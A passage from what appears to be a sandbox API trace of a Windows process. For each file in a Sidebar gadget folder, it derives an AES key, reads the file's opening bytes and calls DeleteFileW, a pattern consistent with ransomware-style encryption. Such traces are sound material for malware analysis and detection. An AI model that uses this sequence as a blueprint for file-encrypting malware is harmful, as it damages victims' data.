phHash=0x3269740) returned 1 [0188.181] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.181] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0188.181] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2d4 [0188.181] ReadFile (in: hFile=0x584, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0188.183] CryptDestroyHash (hHash=0x284d668) returned 1 [0188.183] CryptDestroyKey (hKey=0x284d528) returned 1 [0188.183] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.185] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\init.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\init.js")) returned 0 [0188.185] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0188.186] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0188.186] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.186] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0188.186] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x161e [0188.186] ReadFile (in: hFile=0x590, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0188.189] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0188.189] CryptDestroyKey (hKey=0x284d528) returned 1 [0188.189] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.191] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\library.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\library.js")) returned 0 [0188.192] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0188.193] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0188.193] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.193] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0188.193] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2bf4 [0188.227] ReadFile (in: hFile=0x584, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0188.239] CryptDestroyHash (hHash=0x284d668) returned 1 [0188.239] CryptDestroyKey (hKey=0x284d528) returned 1 [0188.239] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.241] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\localizedStrings.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\localizedstrings.js")) returned 0 [0188.241] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0188.242] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0188.242] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.242] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0188.242] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e28 [0188.242] ReadFile (in: hFile=0x590, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0188.244] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0188.244] CryptDestroyKey (hKey=0x284d528) returned 1 [0188.244] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.246] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\service.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\service.js")) returned 0 [0188.247] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0188.247] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0188.247] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.247] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0188.247] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1ae9 [0188.247] ReadFile (in: hFile=0x5a0, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0188.250] CryptDestroyHash (hHash=0x284d568) returned 1 [0188.250] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0188.250] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.253] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\icon.png")) returned 0 [0188.270] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0188.271] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.272] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.272] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.272] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.272] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3129 [0188.272] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.294] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.294] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.294] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.296] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\activity16v.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\activity16v.png")) returned 0 [0188.296] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.297] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.297] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.297] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.297] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x200 [0188.297] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.298] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.298] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.298] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.299] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\add_down.png")) returned 0 [0188.300] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.301] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.301] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.301] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.301] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1a4 [0188.301] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.303] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.303] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.303] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.304] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_over.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\add_over.png")) returned 0 [0188.304] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.305] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.305] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.305] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.305] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe4 [0188.305] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.306] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.306] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.306] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.308] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_up.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\add_up.png")) returned 0 [0188.308] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.309] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.309] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.309] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.309] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x406b [0188.309] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.337] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.337] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.337] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.338] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-docked.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-docked.png")) returned 0 [0188.339] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.340] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.340] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.340] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.340] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xaa66 [0188.340] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.344] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.344] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.344] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.346] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-2.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-2.png")) returned 0 [0188.347] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.347] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.347] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.347] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.347] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd31a [0188.347] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.359] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.359] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.359] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.360] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-3.png")) returned 0 [0188.361] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.362] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.362] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.362] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.362] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf240 [0188.362] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.386] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.386] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.386] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.388] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-4.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-4.png")) returned 0 [0188.388] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.389] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.389] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.389] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.389] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb93 [0188.389] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.391] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.391] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.391] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.393] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-left.png")) returned 0 [0188.394] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.395] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.395] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.395] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.395] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb45 [0188.395] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.398] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.398] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.398] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.399] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-middle.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-middle.png")) returned 0 [0188.400] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.400] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.400] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.400] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.400] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xba3 [0188.400] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.404] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.404] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.404] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.405] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-right.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-right.png")) returned 0 [0188.406] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.407] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.407] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.407] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.407] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x304 [0188.407] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.409] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.409] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.409] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.410] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_down.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_down.png")) returned 0 [0188.411] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.412] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.412] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.412] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.412] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b8 [0188.412] ReadFile (in: hFile=0x5a0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.414] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0188.414] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.414] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.415] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_over.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\images\\delete_over.png")) returned 0 [0188.416] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0188.417] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0188.417] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0188.417] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0188.417] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1dd [0188.417] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0188.418] CryptDestroyHash (hHash=0x284d528) returned 1 [0188.418] CryptDestroyKey (hKey=0x284d568) returned 1 [0188.418] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0188.420] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\delete_up.png" (normalized: "c:\\program 